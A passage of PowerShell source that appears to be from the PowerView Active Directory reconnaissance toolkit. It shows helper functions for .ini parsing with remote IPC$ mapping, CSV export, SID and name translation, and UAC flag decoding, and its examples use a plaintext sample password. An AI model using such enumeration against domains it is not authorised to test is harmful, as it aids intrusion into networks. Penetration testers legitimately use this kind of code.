.INPUTS
String
Accepts one or more .ini paths on the pipeline.
.OUTPUTS
Hashtable
Ouputs a hashtable representing the parsed .ini file.
.LINK
https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType([Hashtable])]
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName', 'Name')]
[ValidateNotNullOrEmpty()]
[String[]]
$Path,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$OutputObject
)
BEGIN {
$MappedComputers = @{}
}
PROCESS {
ForEach ($TargetPath in $Path) {
if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
$HostComputer = (New-Object System.Uri($TargetPath)).Host
if (-not $MappedComputers[$HostComputer]) {
# map IPC$ to this computer if it's not already
Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
$MappedComputers[$HostComputer] = $True
}
}
if (Test-Path -Path $TargetPath) {
if ($PSBoundParameters['OutputObject']) {
$IniObject = New-Object PSObject
}
else {
$IniObject = @{}
}
Switch -Regex -File $TargetPath {
"^\[(.+)\]" # Section
{
$Section = $matches[1].Trim()
if ($PSBoundParameters['OutputObject']) {
$Section = $Section.Replace(' ', '')
$SectionObject = New-Object PSObject
$IniObject | Add-Member Noteproperty $Section $SectionObject
}
else {
$IniObject[$Section] = @{}
}
$CommentCount = 0
}
"^(;.*)$" # Comment
{
$Value = $matches[1].Trim()
$CommentCount = $CommentCount + 1
$Name = 'Comment' + $CommentCount
if ($PSBoundParameters['OutputObject']) {
$Name = $Name.Replace(' ', '')
$IniObject.$Section | Add-Member Noteproperty $Name $Value
}
else {
$IniObject[$Section][$Name] = $Value
}
}
"(.+?)\s*=(.*)" # Key
{
$Name, $Value = $matches[1..2]
$Name = $Name.Trim()
$Values = $Value.split(',') | ForEach-Object { $_.Trim() }
# if ($Values -isnot [System.Array]) { $Values = @($Values) }
if ($PSBoundParameters['OutputObject']) {
$Name = $Name.Replace(' ', '')
$IniObject.$Section | Add-Member Noteproperty $Name $Values
}
else {
$IniObject[$Section][$Name] = $Values
}
}
}
$IniObject
}
}
}
END {
# remove the IPC$ mappings
$MappedComputers.Keys | Remove-RemoteConnection
}
}
function Export-PowerViewCSV {
<#
.SYNOPSIS
Converts objects into a series of comma-separated (CSV) strings and saves the
strings in a CSV file in a thread-safe manner.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
This helper exports an -InputObject to a .csv in a thread-safe manner
using a mutex. This is so the various multi-threaded functions in
PowerView has a thread-safe way to export output to the same file.
Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
.PARAMETER InputObject
Specifies the objects to export as CSV strings.
.PARAMETER Path
Specifies the path to the CSV output file.
.PARAMETER Delimiter
Specifies a delimiter to separate the property values. The default is a comma (,)
.PARAMETER Append
Indicates that this cmdlet adds the CSV output to the end of the specified file.
Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
.EXAMPLE
Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
.EXAMPLE
Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
.INPUTS
PSObject
Accepts one or more PSObjects on the pipeline.
.LINK
http://poshcode.org/1590
http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
Param(
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[System.Management.Automation.PSObject[]]
$InputObject,
[Parameter(Mandatory = $True, Position = 1)]
[ValidateNotNullOrEmpty()]
[String]
$Path,
[Parameter(Position = 2)]
[ValidateNotNullOrEmpty()]
[Char]
$Delimiter = ',',
[Switch]
$Append
)
BEGIN {
$OutputPath = [IO.Path]::GetFullPath($PSBoundParameters['Path'])
$Exists = [System.IO.File]::Exists($OutputPath)
# mutex so threaded code doesn't stomp on the output file
$Mutex = New-Object System.Threading.Mutex $False,'CSVMutex'
$Null = $Mutex.WaitOne()
if ($PSBoundParameters['Append']) {
$FileMode = [System.IO.FileMode]::Append
}
else {
$FileMode = [System.IO.FileMode]::Create
$Exists = $False
}
$CSVStream = New-Object IO.FileStream($OutputPath, $FileMode, [System.IO.FileAccess]::Write, [IO.FileShare]::Read)
$CSVWriter = New-Object System.IO.StreamWriter($CSVStream)
$CSVWriter.AutoFlush = $True
}
PROCESS {
ForEach ($Entry in $InputObject) {
$ObjectCSV = ConvertTo-Csv -InputObject $Entry -Delimiter $Delimiter -NoTypeInformation
if (-not $Exists) {
# output the object field names as well
$ObjectCSV | ForEach-Object { $CSVWriter.WriteLine($_) }
$Exists = $True
}
else {
# only output object field data
$ObjectCSV[1..($ObjectCSV.Length-1)] | ForEach-Object { $CSVWriter.WriteLine($_) }
}
}
}
END {
$Mutex.ReleaseMutex()
$CSVWriter.Dispose()
$CSVStream.Dispose()
}
}
function Resolve-IPAddress {
<#
.SYNOPSIS
Resolves a given hostename to its associated IPv4 address.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Resolves a given hostename to its associated IPv4 address using
[Net.Dns]::GetHostEntry(). If no hostname is provided, the default
is the IP address of the localhost.
.EXAMPLE
Resolve-IPAddress -ComputerName SERVER
.EXAMPLE
@("SERVER1", "SERVER2") | Resolve-IPAddress
.INPUTS
String
Accepts one or more IP address strings on the pipeline.
.OUTPUTS
System.Management.Automation.PSCustomObject
A custom PSObject with the ComputerName and IPAddress.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('System.Management.Automation.PSCustomObject')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = $Env:COMPUTERNAME
)
PROCESS {
ForEach ($Computer in $ComputerName) {
try {
@(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object {
if ($_.AddressFamily -eq 'InterNetwork') {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'ComputerName' $Computer
$Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString
$Out
}
}
}
catch {
Write-Verbose "[Resolve-IPAddress] Could not resolve $Computer to an IP Address."
}
}
}
}
function ConvertTo-SID {
<#
.SYNOPSIS
Converts a given user/group name to a security identifier (SID).
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain
.DESCRIPTION
Converts a "DOMAIN\username" syntax to a security identifier (SID)
using System.Security.Principal.NTAccount's translate function. If alternate
credentials are supplied, then Get-ADObject is used to try to map the name
to a security identifier.
.PARAMETER ObjectName
The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
.PARAMETER Domain
Specifies the domain to use for the translation, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to for the translation.
.PARAMETER Credential
Specifies an alternate credential to use for the translation.
.EXAMPLE
ConvertTo-SID 'DEV\dfm'
.EXAMPLE
'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred
.INPUTS
String
Accepts one or more username specification strings on the pipeline.
.OUTPUTS
String
A string representing the SID of the translated name.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType([String])]
[CmdletBinding()]
Param(
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name', 'Identity')]
[String[]]
$ObjectName,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$DomainSearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $DomainSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $DomainSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $DomainSearcherArguments['Credential'] = $Credential }
}
PROCESS {
ForEach ($Object in $ObjectName) {
$Object = $Object -Replace '/','\'
if ($PSBoundParameters['Credential']) {
$DN = Convert-ADName -Identity $Object -OutputType 'DN' @DomainSearcherArguments
if ($DN) {
$UserDomain = $DN.SubString($DN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
$UserName = $DN.Split(',')[0].split('=')[1]
$DomainSearcherArguments['Identity'] = $UserName
$DomainSearcherArguments['Domain'] = $UserDomain
$DomainSearcherArguments['Properties'] = 'objectsid'
Get-DomainObject @DomainSearcherArguments | Select-Object -Expand objectsid
}
}
else {
try {
if ($Object.Contains('\')) {
$Domain = $Object.Split('\')[0]
$Object = $Object.Split('\')[1]
}
elseif (-not $PSBoundParameters['Domain']) {
$DomainSearcherArguments = @{}
$Domain = (Get-Domain @DomainSearcherArguments).Name
}
$Obj = (New-Object System.Security.Principal.NTAccount($Domain, $Object))
$Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value
}
catch {
Write-Verbose "[ConvertTo-SID] Error converting $Domain\$Object : $_"
}
}
}
}
}
function ConvertFrom-SID {
<#
.SYNOPSIS
Converts a security identifier (SID) to a group/user name.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Convert-ADName
.DESCRIPTION
Converts a security identifier string (SID) to a group/user name
using Convert-ADName.
.PARAMETER ObjectSid
Specifies one or more SIDs to convert.
.PARAMETER Domain
Specifies the domain to use for the translation, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to for the translation.
.PARAMETER Credential
Specifies an alternate credential to use for the translation.
.EXAMPLE
ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108
TESTLAB\harmj0y
.EXAMPLE
"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID
TESTLAB\WINDOWS2$
TESTLAB\harmj0y
BUILTIN\Distributed COM Users
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred
TESTLAB\harmj0y
.INPUTS
String
Accepts one or more SID strings on the pipeline.
.OUTPUTS
String
The converted DOMAIN\username.
#>
[OutputType([String])]
[CmdletBinding()]
Param(
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('SID')]
[ValidatePattern('^S-1-.*')]
[String[]]
$ObjectSid,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$ADNameArguments = @{}
if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
}
PROCESS {
ForEach ($TargetSid in $ObjectSid) {
$TargetSid = $TargetSid.trim('*')
try {
# try to resolve any built-in SIDs first - https://support.microsoft.com/en-us/kb/243330
Switch ($TargetSid) {
'S-1-0' { 'Null Authority' }
'S-1-0-0' { 'Nobody' }
'S-1-1' { 'World Authority' }
'S-1-1-0' { 'Everyone' }
'S-1-2' { 'Local Authority' }
'S-1-2-0' { 'Local' }
'S-1-2-1' { 'Console Logon ' }
'S-1-3' { 'Creator Authority' }
'S-1-3-0' { 'Creator Owner' }
'S-1-3-1' { 'Creator Group' }
'S-1-3-2' { 'Creator Owner Server' }
'S-1-3-3' { 'Creator Group Server' }
'S-1-3-4' { 'Owner Rights' }
'S-1-4' { 'Non-unique Authority' }
'S-1-5' { 'NT Authority' }
'S-1-5-1' { 'Dialup' }
'S-1-5-2' { 'Network' }
'S-1-5-3' { 'Batch' }
'S-1-5-4' { 'Interactive' }
'S-1-5-6' { 'Service' }
'S-1-5-7' { 'Anonymous' }
'S-1-5-8' { 'Proxy' }
'S-1-5-9' { 'Enterprise Domain Controllers' }
'S-1-5-10' { 'Principal Self' }
'S-1-5-11' { 'Authenticated Users' }
'S-1-5-12' { 'Restricted Code' }
'S-1-5-13' { 'Terminal Server Users' }
'S-1-5-14' { 'Remote Interactive Logon' }
'S-1-5-15' { 'This Organization ' }
'S-1-5-17' { 'This Organization ' }
'S-1-5-18' { 'Local System' }
'S-1-5-19' { 'NT Authority' }
'S-1-5-20' { 'NT Authority' }
'S-1-5-80-0' { 'All Services ' }
'S-1-5-32-544' { 'BUILTIN\Administrators' }
'S-1-5-32-545' { 'BUILTIN\Users' }
'S-1-5-32-546' { 'BUILTIN\Guests' }
'S-1-5-32-547' { 'BUILTIN\Power Users' }
'S-1-5-32-548' { 'BUILTIN\Account Operators' }
'S-1-5-32-549' { 'BUILTIN\Server Operators' }
'S-1-5-32-550' { 'BUILTIN\Print Operators' }
'S-1-5-32-551' { 'BUILTIN\Backup Operators' }
'S-1-5-32-552' { 'BUILTIN\Replicators' }
'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' }
'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' }
'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' }
'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' }
'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' }
'S-1-5-32-559' { 'BUILTIN\Performance Log Users' }
'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' }
'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' }
'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' }
'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' }
'S-1-5-32-573' { 'BUILTIN\Event Log Readers' }
'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' }
'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' }
'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' }
'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' }
'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' }
'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' }
'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' }
Default {
Convert-ADName -Identity $TargetSid @ADNameArguments
}
}
}
catch {
Write-Verbose "[ConvertFrom-SID] Error converting SID '$TargetSid' : $_"
}
}
}
}
function Convert-ADName {
<#
.SYNOPSIS
Converts Active Directory object names between a variety of formats.
Author: Bill Stewart, Pasquale Lantella
Modifications: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)
and translates Active Directory names between various formats using the NameTranslate COM object.
.PARAMETER Identity
Specifies the Active Directory object name to translate, of the following form:
DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
NT4 domain\username; e.g., 'fabrikam\pflynn'
Display display name, e.g. 'pflynn'
DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com'
EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com'
GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
UPN user principal name; e.g., 'pflynn@fabrikam.com'
CanonicalEx extended canonical name format
SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com'
SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'
.PARAMETER OutputType
Specifies the output name type you want to convert to, which must be one of the following:
DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
NT4 domain\username; e.g., 'fabrikam\pflynn'
Display display name, e.g. 'pflynn'
DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com'
EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com'
GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
UPN user principal name; e.g., 'pflynn@fabrikam.com'
CanonicalEx extended canonical name format, e.g. 'fabrikam.com/Users/Phineas Flynn'
SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com'
.PARAMETER Domain
Specifies the domain to use for the translation, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to for the translation.
.PARAMETER Credential
Specifies an alternate credential to use for the translation.
.EXAMPLE
Convert-ADName -Identity "TESTLAB\harmj0y"
harmj0y@testlab.local
.EXAMPLE
"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical
testlab.local/Users/krbtgt
testlab.local/Users/Administrator
.EXAMPLE
Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local
CN=harmj0y,CN=Users,DC=testlab,DC=local
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred
TESTLAB\harmj0y
.INPUTS
String
Accepts one or more objects name strings on the pipeline.
.OUTPUTS
String
Outputs a string representing the converted name.
.LINK
http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[OutputType([String])]
[CmdletBinding()]
Param(
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name', 'ObjectName')]
[String[]]
$Identity,
[String]
[ValidateSet('DN', 'Canonical', 'NT4', 'Display', 'DomainSimple', 'EnterpriseSimple', 'GUID', 'Unknown', 'UPN', 'CanonicalEx', 'SPN')]
$OutputType,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$NameTypes = @{
'DN' = 1 # CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com
'Canonical' = 2 # fabrikam.com/Engineers/Phineas Flynn
'NT4' = 3 # fabrikam\pflynn
'Display' = 4 # pflynn
'DomainSimple' = 5 # pflynn@fabrikam.com
'EnterpriseSimple' = 6 # pflynn@fabrikam.com
'GUID' = 7 # {95ee9fff-3436-11d1-b2b0-d15ae3ac8436}
'Unknown' = 8 # unknown type - let the server do translation
'UPN' = 9 # pflynn@fabrikam.com
'CanonicalEx' = 10 # fabrikam.com/Users/Phineas Flynn
'SPN' = 11 # HTTP/kairomac.contoso.com
'SID' = 12 # S-1-5-21-12986231-600641547-709122288-57999
}
# accessor functions from Bill Stewart to simplify calls to NameTranslate
function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) {
$Output = $Null
$Output = $Object.GetType().InvokeMember($Method, 'InvokeMethod', $NULL, $Object, $Parameters)
Write-Output $Output
}
function Get-Property([__ComObject] $Object, [String] $Property) {
$Object.GetType().InvokeMember($Property, 'GetProperty', $NULL, $Object, $NULL)
}
function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) {
[Void] $Object.GetType().InvokeMember($Property, 'SetProperty', $NULL, $Object, $Parameters)
}
# https://msdn.microsoft.com/en-us/library/aa772266%28v=vs.85%29.aspx
if ($PSBoundParameters['Server']) {
$ADSInitType = 2
$InitName = $Server
}
elseif ($PSBoundParameters['Domain']) {
$ADSInitType = 1
$InitName = $Domain
}
elseif ($PSBoundParameters['Credential']) {
$Cred = $Credential.GetNetworkCredential()
$ADSInitType = 1
$InitName = $Cred.Domain
}
else {
# if no domain or server is specified, default to GC initialization
$ADSInitType = 3
$InitName = $Null
}
}
PROCESS {
ForEach ($TargetIdentity in $Identity) {
if (-not $PSBoundParameters['OutputType']) {
if ($TargetIdentity -match "^[A-Za-z]+\\[A-Za-z ]+") {
$ADSOutputType = $NameTypes['DomainSimple']
}
else {
$ADSOutputType = $NameTypes['NT4']
}
}
else {
$ADSOutputType = $NameTypes[$OutputType]
}
$Translate = New-Object -ComObject NameTranslate
if ($PSBoundParameters['Credential']) {
try {
$Cred = $Credential.GetNetworkCredential()
Invoke-Method $Translate 'InitEx' (
$ADSInitType,
$InitName,
$Cred.UserName,
$Cred.Domain,
$Cred.Password
)
}
catch {
Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' using alternate credentials : $_"
}
}
else {
try {
$Null = Invoke-Method $Translate 'Init' (
$ADSInitType,
$InitName
)
}
catch {
Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' : $_"
}
}
# always chase all referrals
Set-Property $Translate 'ChaseReferral' (0x60)
try {
# 8 = Unknown name type -> let the server do the work for us
$Null = Invoke-Method $Translate 'Set' (8, $TargetIdentity)
Invoke-Method $Translate 'Get' ($ADSOutputType)
}
catch [System.Management.Automation.MethodInvocationException] {
Write-Verbose "[Convert-ADName] Error translating '$TargetIdentity' : $($_.Exception.InnerException.Message)"
}
}
}
}
function ConvertFrom-UACValue {
<#
.SYNOPSIS
Converts a UAC int value to human readable form.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
This function will take an integer that represents a User Account
Control (UAC) binary blob and will covert it to an ordered
dictionary with each bitwise value broken out. By default only values
set are displayed- the -ShowAll switch will display all values with
a + next to the ones set.
.PARAMETER Value
Specifies the integer UAC value to convert.
.PARAMETER ShowAll
Switch. Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.
.EXAMPLE
ConvertFrom-UACValue -Value 66176
Name Value
---- -----
ENCRYPTED_TEXT_PWD_ALLOWED 128
NORMAL_ACCOUNT 512
DONT_EXPIRE_PASSWORD 65536
.EXAMPLE
Get-DomainUser harmj0y | ConvertFrom-UACValue
Name Value
---- -----
NORMAL_ACCOUNT 512
DONT_EXPIRE_PASSWORD 65536
.EXAMPLE
Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll
Name Value
---- -----
SCRIPT 1
ACCOUNTDISABLE 2
HOMEDIR_REQUIRED 8
LOCKOUT 16
PASSWD_NOTREQD 32
PASSWD_CANT_CHANGE 64
ENCRYPTED_TEXT_PWD_ALLOWED 128
TEMP_DUPLICATE_ACCOUNT 256
NORMAL_ACCOUNT 512+
INTERDOMAIN_TRUST_ACCOUNT 2048
WORKSTATION_TRUST_ACCOUNT 4096
SERVER_TRUST_ACCOUNT 8192
DONT_EXPIRE_PASSWORD 65536+
MNS_LOGON_ACCOUNT 131072
SMARTCARD_REQUIRED 262144
TRUSTED_FOR_DELEGATION 524288
NOT_DELEGATED 1048576
USE_DES_KEY_ONLY 2097152
DONT_REQ_PREAUTH 4194304
PASSWORD_EXPIRED 8388608
TRUSTED_TO_AUTH_FOR_DELEGATION 16777216
PARTIAL_SECRETS_ACCOUNT 67108864
.INPUTS
Int
Accepts an integer representing a UAC binary blob.
.OUTPUTS
System.Collections.Specialized.OrderedDictionary
An ordered dictionary with the converted UAC fields.
.LINK
https://support.microsoft.com/en-us/kb/305144
#>
[OutputType('System.Collections.Specialized.OrderedDictionary')]
[CmdletBinding()]
Param(
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('UAC', 'useraccountcontrol')]
[Int]
$Value,
[Switch]
$ShowAll
)
BEGIN {
# values from https://support.microsoft.com/en-us/kb/305144
$UACValues = New-Object System.Collections.Specialized.OrderedDictionary
$UACValues.Add("SCRIPT", 1)
$UACValues.Add("ACCOUNTDISABLE", 2)
$UACValues.Add("HOMEDIR_REQUIRED", 8)
$UACValues.Add("LOCKOUT", 16)
$UACValues.Add("PASSWD_NOTREQD", 32)
$UACValues.Add("PASSWD_CANT_CHANGE", 64)
$UACValues.Add("ENCRYPTED_TEXT_PWD_ALLOWED", 128)
$UACValues.Add("TEMP_DUPLICATE_ACCOUNT", 256)
$UACValues.Add("NORMAL_ACCOUNT", 512)
$UACValues.Add("INTERDOMAIN_TRUST_ACCOUNT", 2048)
$UACValues.Add("WORKSTATION_TRUST_ACCOUNT", 4096)
$UACValues.Add("SERVER_TRUST_ACCOUNT", 8192)
$UACValues.Add("DONT_EXPIRE_PASSWORD", 65536)
$UACValues.Add("MNS_LOGON_ACCOUNT", 131072)
$UACValues.Add("SMARTCARD_REQUIRED", 262144)
$UACValues.Add("TRUSTED_FOR_DELEGATION", 524288)
$UACValues.Add("NOT_DELEGATED", 1048576)
$UACValues.Add("USE_DES_KEY_ONLY", 2097152)
$UACValues.Add("DONT_REQ_PREAUTH", 4194304)
$UACValues.Add("PASSWORD_EXPIRED", 8388608)
$UACValues.Add("TRUSTED_TO_AUTH_FOR_DELEGATION", 16777216)
$UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864)
}
PROCESS {
$ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary
if ($ShowAll) {
ForEach ($UACValue in $UACValues.GetEnumerator()) {
if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) {
$ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+")
}
else {
$ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)")
}
}
}
else {
ForEach ($UACValue in $UACValues.GetEnumerator()) {
if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) {
$ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)")
}
}
}
$ResultUACValues
}
}
function Get-PrincipalContext {
<#
.SYNOPSIS
Helper to take an Identity and return a DirectoryServices.AccountManagement.PrincipalContext
and simplified identity.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.PARAMETER Identity
A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202),
or a DOMAIN\username identity.
.PARAMETER Domain
Specifies the domain to use to search for user/group principals, defaults to the current domain.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $True)]
[Alias('GroupName', 'GroupIdentity')]
[String]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
try {
if ($PSBoundParameters['Domain'] -or ($Identity -match '.+\\.+')) {
if ($Identity -match '.+\\.+') {
# DOMAIN\groupname
$ConvertedIdentity = $Identity | Convert-ADName -OutputType Canonical
if ($ConvertedIdentity) {
$ConnectTarget = $ConvertedIdentity.SubString(0, $ConvertedIdentity.IndexOf('/'))
$ObjectIdentity = $Identity.Split('\')[1]
Write-Verbose "[Get-PrincipalContext] Binding to domain '$ConnectTarget'"
}
}
else {
$ObjectIdentity = $Identity
Write-Verbose "[Get-PrincipalContext] Binding to domain '$Domain'"
$ConnectTarget = $Domain
}
if ($PSBoundParameters['Credential']) {
Write-Verbose '[Get-PrincipalContext] Using alternate credentials'
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget, $Credential.UserName, $Credential.GetNetworkCredential().Password)
}
else {
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget)
}
}
else {
if ($PSBoundParameters['Credential']) {
Write-Verbose '[Get-PrincipalContext] Using alternate credentials'
$DomainName = Get-Domain | Select-Object -ExpandProperty Name
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $DomainName, $Credential.UserName, $Credential.GetNetworkCredential().Password)
}
else {
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
}
$ObjectIdentity = $Identity
}
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'Context' $Context
$Out | Add-Member Noteproperty 'Identity' $ObjectIdentity
$Out
}
catch {
Write-Warning "[Get-PrincipalContext] Error creating binding for object ('$Identity') context : $_"
}
}
function Add-RemoteConnection {
<#
.SYNOPSIS
Pseudo "mounts" a connection to a remote path using the specified
